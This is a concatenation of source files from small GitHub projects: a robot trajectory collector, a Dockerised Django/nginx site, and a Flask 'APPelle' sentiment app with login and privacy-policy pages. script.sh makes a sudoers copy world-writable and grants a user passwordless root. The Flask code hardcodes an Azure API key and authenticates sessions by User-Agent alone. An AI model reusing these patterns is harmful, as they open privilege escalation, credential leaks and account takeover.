\n\t\tmotorsIds=[]\n\t\t#motorsIds.append(env._p.addUserDebugParameter(\"posX\",0.4,0.75,0.537))\n\t\t#motorsIds.append(env._p.addUserDebugParameter(\"posY\",-.22,.3,0.0))\n\t\t#motorsIds.append(env._p.addUserDebugParameter(\"posZ\",0.1,1,0.2))\n\t\t#motorsIds.append(env._p.addUserDebugParameter(\"yaw\",-3.14,3.14,0))\n\t\t#motorsIds.append(env._p.addUserDebugParameter(\"fingerAngle\",0,0.3,.3))\n\t\t\n\t\tdv = 0.00\n\t\t# motorsIds.append(env._p.addUserDebugParameter(\"posX\",-dv,dv,0))\n\t\t# motorsIds.append(env._p.addUserDebugParameter(\"posY\",-dv,dv,0))\n\t\t# motorsIds.append(env._p.addUserDebugParameter(\"posZ\",-dv,dv,0))\n\t\t# motorsIds.append(env._p.addUserDebugParameter(\"yaw\",-dv,dv,0))\n\t\t# motorsIds.append(env._p.addUserDebugParameter(\"fingerAngle\",0,0.3,.3))\n\t\tall_trajectories = []\n\t\tn = 0\n\t\twhile True:\n\t\t\tdone = False\n\t\t\t# Reset z to 0,2 higher than intended because it adds +0.2 internally (possibly finger?)\n\t\t\tstart = np.array([uf(xlow+0.03, xhigh-0.03), uf(ylow+0.03, yhigh-0.03), uf(zlow+0.03,zhigh-0.03)])\n\t\t\tgoal = np.array([uf(xlow+0.03, xhigh-0.03), uf(ylow+0.03, yhigh-0.03), uf(zlow+0.03,zhigh-0.03)])\n\t\t\tstate, success = np.array(env._reset_positions(start)) #default [-0.100000,0.000000,0.070000]\n\t\t\taction = normalize(goal - state[:3])*0.001\n\t\t\teps = 0.01\n\t\t\taction = action.tolist()\n\t\t\taction += [0,0]\n\t\t\tif not success:\n\t\t\t\tenv._reset()\n\t\t\t\tcontinue\n\t\t\t# print('diff goal - start: {}'.format(goal - state[:3]))\n\t\t\t# print('start state: {}, goal state: 
{}'.format(state[:3], goal))\n\t\t\t# print('true state: {}'.format(env._get_link_state()[0]))\n\n\t\t\t# print('normed action: {}'.format((goal - state[:3])/np.linalg.norm(state[:3]- goal)))\n\t\t\t# print('action: {}'.format(action[:3]))\n\t\t\tii = 0\n\n\t\t\ttrajectory = {'action': [], 'state_aug': [], 'next_state_aug': []}\n\t\t\twhile (not done):\n\t\t\t\taction[:3] = normalize(goal - state[:3])*0.005\n\n\t\t\t\tstate_old = copy(state)\n\t\t\t\tstate_old_aug = cat([state[:3], goal])\n\t\t\t\tstate, reward, done, info = env.step2(action)\n\t\t\t\tstate = np.array(state)\n\t\t\t\t#obs = env.getExtendedObservation()\n\t\t\t\tif ii % 1 == 0:\n\t\t\t\t\t# print('normed executed action: {}'.format((state[:3] - state_old[:3])/np.linalg.norm(state[:3] - state_old[:3])))\n\t\t\t\t\t# print('executed action:{}'.format(state[:3] - state_old[:3]))\n\t\t\t\t\t# print(\"\\n\")\n\t\t\t\t\t# print('current state: {}'.format(state[:3]))\n\t\t\t\t\t# print('goal state: {}'.format(goal))\n\t\t\t\t\t# print('action: {}'.format(action[:3]))\n\t\t\t\t\tpass\n\t\t\t\tii += 1\n\n\t\t\t\ttime.sleep(0.01)\n\t\t\t\t# set_trace()\n\t\t\t\ttrajectory['action'].append(action)\n\t\t\t\ttrajectory['state_aug'].append(state_old_aug)\n\t\t\t\ttrajectory['next_state_aug'].append(cat([state[:3], goal]))\n\t\t\t\tif np.linalg.norm(goal - state[:3]) < eps:\n\t\t\t\t\tdone = True\n\t\t\t\tif ii >= 1000:\n\t\t\t\t\tbreak\n\t\t\tif done:\n\t\t\t\tall_trajectories.append(trajectory)\n\n\t\t\t\tif n % 10 == 0:\n\t\t\t\t\tprint(\"collected {} trajectories\".format(n+1))\n\n\n\t\t\t\tif n % 50 == 0:\n\t\t\t\t\tprint(\"save trajectories\")\n\t\t\t\t\tsave_trajectory(all_trajectories, SAVE_PATH, n+1)\n\t\t\t\tn += 1\n\texcept KeyboardInterrupt:\n\t\tsave_trajectory(all_trajectories, SAVE_PATH)\n\nif __name__==\"__main__\":\n main()\n"
}
] | 7 |
serg1231-git/projects | https://github.com/serg1231-git/projects | cce5e60bd2a17d1ef5d97ff852e1e587a761a1b3 | f940996f653d7a28742f23c16a71f655f77f8dff | e43fe9c6dce7548906778a560ed6fff629bdade8 | refs/heads/main | 2023-04-24T12:03:37.217129 | 2021-05-14T06:59:29 | 2021-05-14T06:59:29 | 359,782,730 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7249190807342529,
"alphanum_fraction": 0.7249190807342529,
"avg_line_length": 33.44444274902344,
"blob_id": "f6e1149972eb7d46617f1e61e93335139ef00861",
"content_id": "3eefa221943a2583299b9a364658197f96b00b7d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 309,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 9,
"path": "/Proxy_nginx/Dockerfile",
"repo_name": "serg1231-git/projects",
"src_encoding": "UTF-8",
"text": "FROM nginx:latest\nCOPY ./uwsgi_params /etc/nginx/uwsgi_params\nCOPY ./default.conf /etc/nginx/conf.d/\nRUN mkdir /opt/Proxy\nCOPY ./default.conf /opt/Proxy/\nCOPY ./supersite_oh.ini /opt/Proxy/\nRUN ls -s /opt/Proxy/default.conf /etc/nginx/conf.d/default.conf\nWORKDIR /opt/Proxy/\nCMD [ \"nginx\",\"-g\", \"daemon off;\"]"
},
{
"alpha_fraction": 0.7615384459495544,
"alphanum_fraction": 0.7615384459495544,
"avg_line_length": 25,
"blob_id": "6d2ca067d755b74c8c6e35125cac5c8c24a50f0d",
"content_id": "8d04c6b91c7f305fd3551cd849c55aabd75d439a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 130,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 5,
"path": "/djangoproject/main/views.py",
"repo_name": "serg1231-git/projects",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\n\ndef output_main(request):\n return render(request,'django.html')\n# Create your views here.\n"
},
{
"alpha_fraction": 0.4414668679237366,
"alphanum_fraction": 0.4781382083892822,
"avg_line_length": 21.870967864990234,
"blob_id": "ed25238b675fac49d6cef9454b204571fc4f5ae9",
"content_id": "e50ad747bc553fdbb516f765d7c7467c1f8b0aaf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "YAML",
"length_bytes": 709,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 31,
"path": "/docker-compose.yml",
"repo_name": "serg1231-git/projects",
"src_encoding": "UTF-8",
"text": "version: '3.8'\nservices:\n \n start-nginx:\n build: \n context: ./Proxy_nginx\n ports: \n - \"7777:7777\"\n container_name: nginx\n depends_on: \n - start-project-django\n volumes: \n - ./Proxy_nginx:/opt/Proxy/\n networks: \n - web_bridge\n \n start-project-django:\n build: \n context: .\n container_name: start-django\n volumes: \n - ./djangoproject:/opt/djangoproject/\n ports: \n - \"8000:8000\"\n command: sh -c \"python manage.py runserver 0.0.0.0:8000\"\n networks: \n - web_bridge\n\nnetworks: \n web_bridge:\n driver: bridge\n"
},
{
"alpha_fraction": 0.7448210716247559,
"alphanum_fraction": 0.7526679039001465,
"avg_line_length": 90.02857208251953,
"blob_id": "cc490b7b7fd143b3d8aa61f46bfebf8ce1fa9f76",
"content_id": "aa0b885aa5601c53df583d179c87ba9678459dc3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 5279,
"license_type": "no_license",
"max_line_length": 583,
"num_lines": 35,
"path": "/djangoproject/res/main.html",
"repo_name": "serg1231-git/projects",
"src_encoding": "UTF-8",
"text": "<html>\n <head>\n\t<meta charset=\"utf-8\">\n <title>History Koenigsegg</title>\n <style>\n img{\n text-align: center;\n width: 200px;\n height: 200px;\n }\n </style>\n </head>\n <body>\n <p>\n Свою историю марка сверхмощных и скоростных автомобилей, которые производятся небольшой шведской компанией из местечка Ангельхольм, начала не так уж давно, в 1993 году. Но даже за такой короткий срок, Koenigsegg смогла завоевать бешеную популярность и признание в кругах настоящих автомобильных гурманов, и оказаться в топ рейтинге лучших авто современности.\n </p>\n <p>\n Создателем молодой автомобильной марки и одноименной компании является потомок древнего шведского рода Кристиан фон Кёнигсегг, который вместе с известнейшим дизайнером Дэвидом Крафордом в очень короткие сроки назло всем завистникам смог создать авто необычайной мощности. В общей сложности новый болид собирали 1,5 года поэтапно, чередуя практические испытания и само изготовление машины. Команда под руководством фон Кёнигсегга смогла сделать таки невозможное. Автомобиль оказался значительно лучше по многим параметрам, чем уже существующие лидеры.\n </p>\n <p>\n Для изготовления мощнейшего спортивного автомобиля, способно достойно конкурировать с нынешними лидерами были задействованы самые новые технологии автомобилестроения, включая также комфортабельность болида. После создания опытного образца Кристианом фон Кёнигсегг представители очень многих известных автомобильных компаний только лишь восхищенно лицезрели плоды его работы. Придраться было не к чему. Филигранность и четкость автомобиля вызывала неподдельное восхищение. И уже никто не сомневался, что сегмент высокоскоростных машин вскоре будет занят новым конкурентом.\n </p>\n <img src=\"/static/image/koenigsegg_logo.jpg\">\n <p>\n На сегодняшний день компания Koenigsegg по праву находится в списке самых лучших производителей элитных машин. А выход в свет последней разработки компании – автомобиля Koenigsegg CCXR только лишь подтвердил это. CCXR неофициально нарекли секретным биологическим оружием. Так как для работы двигателя в авто используется биологическое топливо, благодаря чему повышается эффективность работы двигателя, которую невозможно достичь, используя даже самый высококлассный бензин.\n </p>\n <p>\n Компания Koenigsegg при производстве своих авто использует исключительно качественные и дорогостоящие комплектующие, которые выполняются на заказ ведущими предприятиями автомобильной отрасли. Это и оправдывает высокую стоимость автомобилей Koenigsegg. Например, последняя модель Koenigsegg CCXR стоит порядка 1 млн. 200 000 $. Команда компании одновременно может выполнять сборку 7 авто.\n </p>\n <img src=\"/static/image/koenigsegg_ccr.jpg\">\n <p>\n Выпуск в 2004 машины Koenigsegg CCR способствовал тому, что команда Koenigsegg была занесена в книгу рекордов Гиннеса за производство самого мощного авто за всю историю автомобилестроения, подходящего для общественных дорог.\n </p>\n </body>\n</html>\n"
},
{
"alpha_fraction": 0.7368420958518982,
"alphanum_fraction": 0.7532894611358643,
"avg_line_length": 32.88888931274414,
"blob_id": "9509cfdad09fda6304bf871140ec163a02169869",
"content_id": "8c341621a5fc2a241d446e4549bc06a016735005",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 304,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 9,
"path": "/Dockerfile",
"repo_name": "serg1231-git/projects",
"src_encoding": "UTF-8",
"text": "FROM python:3.9.4-buster\nENV PYTHONUNBUFFERED=1\nRUN mkdir /opt/djangoproject/\nCOPY ./djangoproject /opt/djangoproject/\nCOPY ./install.txt /opt/djangoproject/\nWORKDIR /opt/djangoproject/\nRUN pip3 install -r install.txt\nCOPY ./Proxy_nginx/ /opt/Proxy/\nCMD [ \"uwsgi\", \"--ini\", \"/opt/Proxy/supersite_oh.ini\"]"
},
{
"alpha_fraction": 0.7936508059501648,
"alphanum_fraction": 0.841269850730896,
"avg_line_length": 20.11111068725586,
"blob_id": "99a47950471f2b974b7f2b84b37efde090d74205",
"content_id": "2d93929c1ef42bbad58740220b2761d41153c6e4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 189,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 9,
"path": "/Proxy_nginx/supersite_oh.ini",
"repo_name": "serg1231-git/projects",
"src_encoding": "UTF-8",
"text": "[uwsgi]\nchdir=/opt/djangoproject/\nmodule=djangoproject.wsgi:application\nmaster=true\nprocesses=10\nsocket=localhost:8000\nlogfile=/opt/djangoproject/logs/uwsgi.log\nchmod-socket=666\nvacuum=true"
},
{
"alpha_fraction": 0.7053763270378113,
"alphanum_fraction": 0.7075268626213074,
"avg_line_length": 24.77777862548828,
"blob_id": "502680cac897e973adb0454e4cd95c974a77bd3b",
"content_id": "a5ca1a5c8b63a4fab07fa631d0d72f2d753c34c4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 465,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 18,
"path": "/script.sh",
"repo_name": "serg1231-git/projects",
"src_encoding": "UTF-8",
"text": "random_direct=($(ls -a / | shuf -n 1))\ncd /$random_direct\n#!/bin/bash\necho \"Input customer\"\nread use\ndirect=($(getent passwd $use))\nif [[ $direct ]]; then\necho \"User $use in system\"\nelse\nsudo useradd $use\necho \"User $use will successfully created\"\nfi\nsudo adduser $use sudo\nsudo cp /etc/sudoers /etc/sudoers.new\nsudo chmod ugo+rwx /etc/sudoers.new\necho \"$use ALL=(ALL:ALL) NOPASSWD: ALL\" >> /etc/sudoers.new\nsudo cp /etc/sudoers.new /etc/sudoers\nssh-keygen -t rsa\n\n"
}
] | 7 |
HarangusPaul/Bool-s | https://github.com/HarangusPaul/Bool-s | b66401adcd7e6e9708f4b4a198713c754a2fe395 | 9b7c30fde0e648aca66301441b03c94cc932d02a | 88ec0ff60017bc08b9d49763214308e579f6e715 | refs/heads/master | 2022-12-28T21:23:58.836054 | 2020-10-02T13:45:42 | 2020-10-02T13:45:42 | 273,960,017 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6312981843948364,
"alphanum_fraction": 0.6434499025344849,
"avg_line_length": 36.69832229614258,
"blob_id": "cd61796018f14e30a7d46b479ed5c2be06e3a640",
"content_id": "7258d598e0a6f07ff567c7f3b8747d61686679cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6748,
"license_type": "no_license",
"max_line_length": 159,
"num_lines": 179,
"path": "/Interfata/LogInCode.py",
"repo_name": "HarangusPaul/Bool-s",
"src_encoding": "UTF-8",
"text": "from flask import Flask,render_template,request\nfrom passlib.hash import pbkdf2_sha256\nfrom Database.DB_CodeUsers import database_GetPassword\nfrom Database.DB_CodeUsers import validate_existence\nfrom Database.DB_CodeUsers import create_NewUser\nfrom Ai.API_AI_text import transmitdata\nfrom Database.DB_CodeUsers import send_Text_Answer,database,send_Facial_Answer\nimport webbrowser\nfrom Interfata.User import User\nfrom werkzeug.utils import secure_filename\nimport sys, os\nfrom Ai.ApiFacial import file_user\n\ndef encrypt_password(password):\n return pbkdf2_sha256.hash(password)\n\n\ndef validate(UserName,Password):\n string = database_GetPassword(UserName)\n if pbkdf2_sha256.verify(Password, string):\n return 1\n return 0\n\nlist_of_errors = [\"Username/Password incorect\",\"No username\",\"No password\",\"Password not match\"]\n\napp = Flask(__name__)\n\nlist_of_logged_users = []\n\ndef add_new_user(username,browser):\n New_User = User(browser,username)\n list_of_logged_users.append(New_User)\n\[email protected](\"/\")\ndef main():\n for user in list_of_logged_users:\n user_data = request.headers.get('User-Agent')\n if user_data == user.get_browser():\n return render_template(\"MainFacut.html\",n = user.get_user())\n return render_template(\"HomePage.html\")\n\[email protected](\"/reg\")\ndef register():\n return render_template(\"Register.html\")\n\[email protected](\"/reg\",methods=[\"GET\",\"POST\"])\ndef settingData():\n FullName = request.form['fullname']\n Age = int(request.form['age'])\n try:\n Gender = request.form['Option']\n except Exception as ex:\n return render_template(\"Register.html\",n = \"Gender not selected\")\n UserName = request.form['username']\n Email = request.form['email']\n Pass1 = request.form['password']\n Pass2 = request.form['password0']\n if Age < 13 or Age > 110:\n return render_template(\"Register.html\",n = \"Age not corresspond\")\n if Email == \"\" or FullName == \"\" or Age == \"\":\n return render_template(\"Register.html\", n = \"Not completed spaces!\")\n if Pass1 != Pass2:\n return render_template(\"Register.html\",n = list_of_errors[3])\n if len(Pass1) < 6:\n return render_template(\"Register.html\",n = \"A password have atleast 6 characters\")\n freespace = validate_existence(UserName)\n if freespace == 1:\n return render_template(\"Register.html\",n = \"User already exist!\")\n Password = encrypt_password(Pass1)\n create_NewUser(UserName,FullName,Age,Gender,Password,Email,\"\",\"\",\"\",\"\",\"\")\n return render_template(\"MainFacut.html\",n = UserName)\n\[email protected](\"/login\")\ndef login():\n return render_template(\"py.html\")\n\[email protected]('/login',methods=[\"GET\",\"POST\"])\ndef getingData():\n UserName = request.form['username']\n Password = request.form['password']\n step = validate(UserName,Password)\n if Password == \"\":\n return render_template('py.html', n=list_of_errors[2])\n if UserName == \"\":\n return render_template('py.html', n = list_of_errors[1])\n if step == 0:\n return render_template('py.html',n=list_of_errors[0])\n user_data = request.headers.get('User-Agent')\n add_new_user(UserName,user_data)\n return render_template(\"MainFacut.html\",n = UserName)\n\[email protected](\"/terms\")\ndef terms():\n return render_template(\"TermsOfUse.html\")\n\[email protected](\"/personaldata\")\ndef personal_data():\n return render_template(\"PersonalData.html\")\n\[email protected](\"/acc\",methods= [\"GET\",\"POST\"])\ndef get_acc():\n for user in list_of_logged_users:\n user_data = 
request.headers.get('User-Agent')\n if user_data == user.get_browser():\n d = database(user.get_user())\n return render_template(\"Account.html\",n = user.get_user() , n3 = user.get_user(),n0 =d['Full_Name'],n1 = d['Age'],n2 = d['Gender'],n4 = d['Gmail'])\n\[email protected](\"/scan\")\ndef facial():\n for user in list_of_logged_users:\n user_data = request.headers.get('User-Agent')\n if user_data == user.get_browser():\n return render_template(\"FacialScanPage.html\", n=user.get_user())\n\[email protected](\"/scan\",methods= [\"GET\",\"POST\"])\ndef facial_scan():\n for user in list_of_logged_users:\n user_data = request.headers.get('User-Agent')\n if user_data == user.get_browser():\n username = user.get_user()\n try:\n if request.method == 'POST':\n file = request.files['file']\n filename = secure_filename(file.filename)\n file.save(os.path.join(\"\", filename))\n\n d1 = file_user(str(filename))\n #some work\n send_Facial_Answer(username,d1)\n return render_template(\"ResultPageScan.html\",n = username,n2 = d1)\n except Exception as ex:\n for user in list_of_logged_users:\n user_data = request.headers.get('User-Agent')\n if user_data == user.get_browser():\n return render_template(\"FacialScanPage.html\", n=user.get_user())\[email protected](\"/questions\")\ndef question():\n user_data = request.headers.get('User-Agent')\n for user in list_of_logged_users:\n if user.get_browser() == user_data:\n return render_template(\"Questions.html\",n1 = user.get_user())\[email protected](\"/questions\",methods=[\"GET\",\"POST\"])\ndef getquestion():\n Description1 = request.form['d1']\n Description2 = request.form['d2']\n Description3 = request.form['d3']\n\n try:\n Yes_No1 = str(request.form[\"yes/no1\"])\n Yes_No2 = str(request.form[\"yes/no2\"])\n Yes_No3 = str(request.form[\"yes/no3\"])\n Yes_No4 = str(request.form[\"yes/no4\"])\n Yes_No5 = str(request.form[\"yes/no5\"])\n Yes_No6 = str(request.form[\"yes/no6\"])\n except Exception as ex:\n return render_template(\"Questions.html\",n = \"Yes/No:Every entry must be complited\")\n try:\n Introvert = request.form[\"radio\"]\n except Exception as ex:\n return render_template(\"Questions.html\", n=\"Match Words:Every entry must be complited\")\n Favmusic = request.form[\"mw2\"]\n try:\n Color = request.form[\"color\"]\n except Exception as ex:\n return render_template(\"Questions.html\", n=\"Match Words:Every entry must be complited\")\n\n Final_text = Description1 + \".\" + Description2 + \".\" + Description3 + \".\" + Yes_No1 + Yes_No2 + Yes_No3 + Yes_No4 + Yes_No5 + Yes_No6\n Final_text = Final_text + Introvert + \".\" + Favmusic + \".\" + Color\n\n user_data = request.headers.get('User-Agent')\n for user in list_of_logged_users:\n if user.get_browser() == user_data:\n send_Text_Answer(user.get_user(),Final_text)\n return render_template('ResultPageQuestionnaire.html',n1=user.get_user(),n = transmitdata(Final_text))\n\n\ndef start():\n webbrowser.open('http://127.0.0.1:5000/')\n app.run(debug=True)\n"
},
{
"alpha_fraction": 0.6715916991233826,
"alphanum_fraction": 0.6957689523696899,
"avg_line_length": 39.24324417114258,
"blob_id": "413e8d8819bf523dcaa16474993de62eee1316e3",
"content_id": "7a3b729d09ee5a1d8ae58f654a51d482b3f58663",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1489,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 37,
"path": "/Ai/API_AI_text.py",
"repo_name": "HarangusPaul/Bool-s",
"src_encoding": "UTF-8",
"text": "from azure.ai.textanalytics import TextAnalyticsClient\nfrom azure.core.credentials import AzureKeyCredential\n\nKEY = '7e6281e1d9654acbac4a53d1617203f2'\nENDPOINT = 'https://appelletext.cognitiveservices.azure.com/'\n\ndef authenticate_client():\n ta_credential = AzureKeyCredential(KEY)\n text_analytics_client = TextAnalyticsClient(\n endpoint=ENDPOINT, credential=ta_credential)\n return text_analytics_client\n\nclient = authenticate_client()\n\ndef sentiment_analysis_example(client,user_text):\n documents = []\n\n documents.append(user_text)\n response = client.analyze_sentiment(documents=documents)[0]\n text = \"Document Sentiment: {}\".format(response.sentiment)\n text = text + \"\\n\" +\"Overall scores: positive={0:.2f}; neutral={1:.2f}; negative={2:.2f}\".format(\n response.confidence_scores.positive,\n response.confidence_scores.neutral,\n response.confidence_scores.negative,\n )\n for idx, sentence in enumerate(response.sentences):\n text2 = \"\\n\" + \"Sentence: {}\".format(sentence.text)\n text = text + \"\\n\" + \"Sentence {} sentiment: {}\".format(idx + 1, sentence.sentiment)\n text = text +\"\\n\"+\"Sentence score:\\nPositive={0:.2f}\\nNeutral={1:.2f}\\nNegative={2:.2f}\\n\".format(\n sentence.confidence_scores.positive,\n sentence.confidence_scores.neutral,\n sentence.confidence_scores.negative,\n )\n return text\n\ndef transmitdata(text):\n return sentiment_analysis_example(client, text)\n"
},
{
"alpha_fraction": 0.6150442361831665,
"alphanum_fraction": 0.6150442361831665,
"avg_line_length": 21.700000762939453,
"blob_id": "68e21503dd9cee85f63327a34877f6ec00b1ce2c",
"content_id": "2559d088fdf32b4b56304cd7b9276c03d6dd27a9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 226,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 10,
"path": "/Interfata/User.py",
"repo_name": "HarangusPaul/Bool-s",
"src_encoding": "UTF-8",
"text": "class User:\n def __init__(self,browser,username):\n self.browser = browser\n self.username = username\n\n def get_user(self):\n return self.username\n\n def get_browser(self):\n return self.browser"
},
{
"alpha_fraction": 0.6285880208015442,
"alphanum_fraction": 0.635715663433075,
"avg_line_length": 39.14929962158203,
"blob_id": "f40c8dc1494a5d9c9a97469ebe622d0c877f6cf7",
"content_id": "b92bfd00c1008aa6902afb146b8b4f8c95dc34bb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 25945,
"license_type": "no_license",
"max_line_length": 622,
"num_lines": 643,
"path": "/Interfata/templates/PersonalData.html",
"repo_name": "HarangusPaul/Bool-s",
"src_encoding": "UTF-8",
"text": "<!DOCTYPE html>\n<html lang=\"en\">\n<head>\n <meta charset=\"UTF-8\">\n <title>Title</title>\n <style>\n body {margin:0;}\n\nbody {\nmargin: 0;\npadding: 0;\nbackground-image: ;\nbackground-size: cover;\nbackground-position: center;\nfont-family: \"Times New Roman\", Times, serif;\n}\n.header {\npadding: 120px;\ntext-align: center;\nbackground-image: url(\"./static/WWHOMEPAGE.jpg\");\nbackground-size: 100% 100%;\ncolor: white;\n}\n\n\n\n/* Increase the font size of the heading */\n.header h1 {\n font-size: 40px;\n}\n\n.navbar {\n overflow: hidden;\n background-color: #001c4d;\n position: -webkit-sticky;\n position: sticky;\n top: 0;\n width: 100%;\n opacity: 0.9;\n}\n\n.footerbar {\n overflow: hidden;\n position: -webkit-sticky;\n top: 0;\n width: 100%;\n\n}\n\n.footerbar a {\n float: left;\n display: block;\n color: #0D3C50;\n text-align: center;\n padding: 14px 16px;\n text-decoration: none;\n font-size: 17px;\n}\n\n/* Right-aligned link */\n.footerbar a.right {\n float: right;\n}\n\n.footerbar a:hover {\n\n color: #FF6701;\n}\n\n.navbar a {\n float: left;\n display: block;\n color: #f2f2f2;\n text-align: center;\n padding: 14px 16px;\n text-decoration: none;\n font-size: 17px;\n}\n\n/* Right-aligned link */\n.navbar a.right {\n float: right;\n font-weight: bold;\n}\n\n\n.navbar a:hover {\n color: #Fcab00;\n}\n\n.main {\n padding: 16px;\n margin: 30px 50px 150px 50px ;\n height: auto; /* Used in this example to enable scrolling */\n}\n\n/* Footer */\n.footer {\n padding: 20px;\n text-align: center;\n background: #ddd;\n}\n\n/* Responsive layout - when the screen is less than 700px wide, make the two columns stack on top of each other instead of next to each other */\n@media screen and (max-width: 700px) {\n .row {\n flex-direction: column;\n }\n}\n\n/* Responsive layout - when the screen is less than 400px wide, make the navigation links stack on top of each other instead of next to each other */\n@media screen and (max-width: 400px) {\n .navbar a {\n float: none;\n width: 100%;\n }\n}\n\n\n* {\n box-sizing: border-box;\n}\n.main t{\n\ttext-decoration: none;\n\tfont-size: 12px;\n\tline-height: 20px;\n\tcolor:black;\n\n}\n.main p{\n\ttext-decoration: none;\n\tfont-size: 12px;\n\tline-height: 20px;\n\tcolor:black;\n\n}\n\n </style>\n</head>\n<body>\n\n\n <div class=\"header\">\n </div>\n\n <div class=\"navbar\">\n <a href=\"http://127.0.0.1:5000\">Home</a>\n<!-- <a href=\"http://127.0.0.1:5000/questions\">Questions Page</a>-->\n<!-- <a href=\"#facialscan\">Facial Scan Page</a>-->\n <a class=\"right\">{{n}}</a>\n\n </div>\n\n <div class=\"main\">\n\n <br>\n <h4>PERSONAL DATA PROTECTION POLICY</h4>\n <t>The ambition of the APPelle webapp is to be a model corporate citizen and to build a better world. Therefore, we attach great importance to the principles of honesty and transparency and are invested in building a strong and lasting relationship with our customers and employees, based on trust and mutual interest. Part of this ambition involves protecting and respecting your privacy as well as your choices. Respecting your privacy is essential for us. This is why we have set out our \"Privacy Promise\" and our entire Privacy Policy below.</t>\n <h5>OUR PROMISE OF CONFIDENTIALITY</h5>\n <t>We respect your privacy and your options. </t><br>\n <t>We make sure that security and confidentiality are built into everything we do.</t><br>\n <t>We will not send you marketing communications unless you have asked us to. 
You can change your mind at any time.</t>\n <t>We will not provide or sell your data.</t><br>\n <t>We are committed to keeping your data safe and secure. This includes only working with trusted partners.</t><br>\n <t>We are committed to being open and transparent about how we use your data.</t><br>\n <t>We do not use your data in other ways that have not been stipulated.</t><br>\n <t>We respect your rights and always try to satisfy your requests as efficiently as possible, in accordance with our legal and operational responsibilities.</t><br>\n <br><t>For more information about our privacy practices, we set out below the types of personal data we may receive directly from you or your interactions with us, how we may use them, with whom we may share them, and how we protect them. we keep them safe as well as your rights regarding your personal data. Of course, all situations may not apply to you. This privacy policy gives you an overview of all possible situations in which we may interact together.</t><br>\n <t>The more you interact with us, the more you allow us to get to know you and the more we can offer you personalized services.</t><br>\n <t>When you provide us with personal data or when we collect personal data about you, we will use it in accordance with this policy. Please read this information carefully as well as our Q&A page (if any) carefully. If you have any questions or concerns regarding your personal data, please contact us at [email protected].</t><br><br>\n <h5>WHO WE ARE</h5>\n\n <t>APPelle is a personal-social application and is responsible for the personal data you share with us.</t><br>\n <t>For any questions or concerns regarding this policy or your rights, you may contact the person responsible for personal data protection at the email address: [email protected].</t><br><br>\n\n <h5>WHAT ARE PERSONAL DATA?</h5>\n <t>\"Personal data\" means any information or information that can identify you directly (for example, your name) or indirectly (for example, through pseudonymous data, such as a unique identification number). This means that personal data includes things like email / home address / mobile phone, username, profile pictures, personal preferences and shopping habits, user-generated content, financial information and financial statement information. It may also include unique numeric identifiers, such as the IP address of your computer or the MAC address of your mobile device, as well as cookies.</t><br><br>\n\n <h5>WHAT KIND OF DATA DO WE COLLECT FROM YOU AND HOW DO WE USE IT?</h5>\n <t>APPelle believes that you, the consumer, are at the center of what we do. We love to hear from you, learn about who you are, and create and deliver products for you to enjoy. And we are aware that many of you enjoy talking to us. Because of this there are many ways to share your personal data with us and we can collect it.</t><br><br>\n\n <h5>How do we collect or receive your data?</h5>\n\n <t>We may collect or receive data from you through websites, forms, applications, devices, and in other ways. Sometimes you give us this directly (for example, when you create an account, when you contact us, sometimes we collect them (for example, using cookies to understand how you use our site / applications).</t><br>\n <t>When we collect data, we indicate the required fields with asterisks if such data is required for us:</t><br><br>\n <t>1. To provide you with the service you have requested (for example, to provide you with a newsletter);</t><br>\n <t>2. 
To comply with legal requirements (eg billing).</t><br><br>\n\n <t>If you do not provide the data marked with an asterisk, this may affect our ability to provide the products and services.</t><br>\n <t>We will present more details in the table below, explaining:</t><br><br>\n\n <t>1. During what interaction period can your data be provided or collected? This column explains the activity or situation you are in when we use or collect your data. For example, if you make a purchase, subscribe to a newsletter, or browse a site / application.</t><br>\n <t>2. What personal data do we receive directly from you or what results from your interaction with us? This column explains the types of data we may collect depending on the situation.</t><br>\n <t>3. How and why could we use them? This column explains what we can do with your data and the purpose for which we collect it.</t><br>\n <t>4. What is the legal basis for the use of your personal data? This column explains why we may use your data.</t><br><br>\n\n <t>Depending on the purpose for which the data is used, the legal basis for processing your data may be:</t><br><br>\n <t>1. Your consent;</t><br>\n <t>2. Our legitimate interest, which could be:</t><br>\n <t>2.1. Improving our products and services: specifically, our business interests to help us better understand your needs and expectations and therefore improve our services, sites / applications / devices, products and brands for the benefit of our consumers .</t><br>\n <t>2.2. Fraud prevention: to ensure that payment is complete and free from fraud.</t><br>\n <t>3. Securing our tools: keeping the tools you use (our sites / applications / devices) safe and making sure they work properly and are constantly improving.</t><br>\n <t>4. Fulfilling a contract: more precisely to perform the services you request from us.</t><br>\n <t>5. 
